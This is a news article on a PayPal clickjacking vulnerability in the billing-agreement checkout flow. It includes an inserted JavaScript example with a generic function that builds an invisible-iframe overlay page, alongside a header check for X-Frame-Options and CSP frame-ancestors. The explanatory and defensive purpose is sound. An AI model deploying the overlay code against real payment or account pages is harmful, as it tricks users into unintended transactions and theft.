PayPal users may be prone to money loss because of a vulnerability

May 26, 2022
Tags: PayPal, Money Loss, Vulnerability, Money Transfer, Clickjacking, Online Payments

A newly discovered, unpatched vulnerability in PayPal's money transfer service could let threat actors trick victims into unknowingly completing attacker-controlled transactions. The researcher who found the flaw warned that users could give away their money without realising it, since the attack completes with a single click.

UI redressing, also called clickjacking, is a technique in which a threat actor deceives an unsuspecting user into clicking a concealed but convincing web page element. Clickjacking can be used to make the user download malware, redirect the user to a malicious website, disclose sensitive information, or perform an action they never intended, such as approving a payment.

Threat actors typically carry out this attack by loading the target page in an invisible iframe and laying it over a decoy page that the attacker controls. The user believes they are clicking an element of the visible decoy page, but the click actually goes to the transparent, authentic page layered on top of it.

The clicks the victim intends for the decoy page are therefore delivered to the authentic page, which usually belongs to a different domain or application. The researcher who discovered the flaw stated that it was reported to the company in October of last year (2021).
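The overlay described above, together with the response-header check that stops it, as an added example that is not part of the article and is not PayPal's or the researcher's code. The URLs, pixel coordinates and header values are constructed for illustration; the origin matching in the CSP branch is simplified to exact origins, whereas real browsers also accept host patterns and wildcards.

```javascript
// Attacker side: a decoy page with the target loaded in a transparent iframe
// positioned so that the target's real button sits exactly under the decoy.
// targetButtonX/Y is where the real button is inside the target page, which
// the attacker measures beforehand (assumed values in this example).
function buildClickjackPage(targetUrl, decoyLabel, targetButtonX, targetButtonY) {
  const decoyX = 100;
  const decoyY = 100;
  // Shift the frame so the target's button lands at the decoy's position.
  const frameLeft = decoyX - targetButtonX;
  const frameTop = decoyY - targetButtonY;
  return [
    '<!doctype html>',
    '<html><body>',
    `<button style="position:absolute;left:${decoyX}px;top:${decoyY}px;width:200px;height:40px">${decoyLabel}</button>`,
    // opacity:0 keeps the frame invisible; z-index:2 puts it above the decoy,
    // so the victim's click never reaches the decoy button at all.
    `<iframe src="${targetUrl}" style="position:absolute;left:${frameLeft}px;top:${frameTop}px;width:1200px;height:900px;opacity:0;z-index:2;border:0"></iframe>`,
    '</body></html>',
  ].join('\n');
}

// Defender side: the browser refuses to render the frame when the target
// sends X-Frame-Options or a CSP frame-ancestors directive that excludes the
// framing origin. This reproduces that decision for a set of response headers
// (header names are matched case-insensitively). Returns true if framerOrigin
// may embed targetOrigin's page.
function framingAllowed(headers, targetOrigin, framerOrigin) {
  const get = (name) => {
    const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
    return key ? headers[key] : undefined;
  };
  const framer = framerOrigin.toLowerCase();
  const target = targetOrigin.toLowerCase();

  const csp = get('content-security-policy');
  if (csp) {
    const directive = csp
      .split(';')
      .map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      // When both headers are present, frame-ancestors takes precedence and
      // X-Frame-Options is ignored, so we decide here and return.
      const sources = directive
        .split(/\s+/)
        .slice(1)
        .map((s) => s.replace(/^'|'$/g, '').toLowerCase());
      if (sources.includes('none')) return false;
      if (sources.includes('*')) return true;
      if (sources.includes('self') && framer === target) return true;
      return sources.includes(framer);
    }
  }

  const xfo = get('x-frame-options');
  if (xfo) {
    const value = xfo.trim().toUpperCase();
    if (value === 'DENY') return false;
    if (value === 'SAMEORIGIN') return framer === target;
    // ALLOW-FROM is obsolete and any unrecognised value is ignored by current
    // browsers, which means no protection.
  }
  return true;
}

// Constructed sample: a target with no framing protection versus one that
// sends a restrictive CSP alongside X-Frame-Options.
const unprotected = {};
const protectedHeaders = {
  'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'",
  'X-Frame-Options': 'DENY',
};
console.log('unprotected page frameable by attacker:',
  framingAllowed(unprotected, 'https://pay.example', 'https://evil.example')); // true
console.log('protected page frameable by attacker:',
  framingAllowed(protectedHeaders, 'https://pay.example', 'https://evil.example')); // false
```

The practical check is to fetch the endpoint you care about while logged in and run its response headers through framingAllowed with your own origin as the framer: if it returns true, the page can be clickjacked from any site. Framing protection should be paired with SameSite cookies so that a framed request does not carry the session at all.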

PayPal users can unknowingly pay for something without realising that a payment has taken place.
The researcher then explained that the affected endpoint was built for Billing Agreements only and should therefore accept nothing but a BillingAgreementToken. The analysis showed, however, that the endpoint also accepted another token type, and that this flaw could be used to steal money from a PayPal account.

This means a threat actor could embed the endpoint inside an iframe so that a victim who is already logged in to PayPal in their browser transfers funds to an attacker-controlled PayPal account.

Furthermore, the attack could have had severe consequences for online portals that integrate the same PayPal checkout flow, where it could also have let a malicious actor deduct large amounts from PayPal users.

The researcher also indicated that the vulnerability could be used to pay other balances with the victim's PayPal account, such as Netflix and other subscription-based services, and that some online services let credit be added using PayPal, which an attacker could abuse in the same way.
